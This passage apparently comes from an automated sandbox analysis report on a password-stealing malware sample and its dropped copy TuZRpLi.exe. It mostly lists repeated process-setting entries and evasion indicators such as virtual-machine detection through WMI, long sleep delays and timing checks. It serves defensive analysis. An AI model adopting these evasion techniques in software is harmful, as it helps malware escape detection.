                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: TuZRpLi.exe PID: 2124, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 5FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 6FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 8210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 1830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 3360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 6130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 7130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 2D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory allocated: 2A50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F22019 rdtsc 17_2_05F22019
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7905Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 822Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8607Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 951Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWindow / User API: threadDelayed 2006Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWindow / User API: threadDelayed 1775Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWindow / User API: threadDelayed 642
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWindow / User API: threadDelayed 2146
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 1632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep time: -922337203685477s >= -30000sJump to behavior
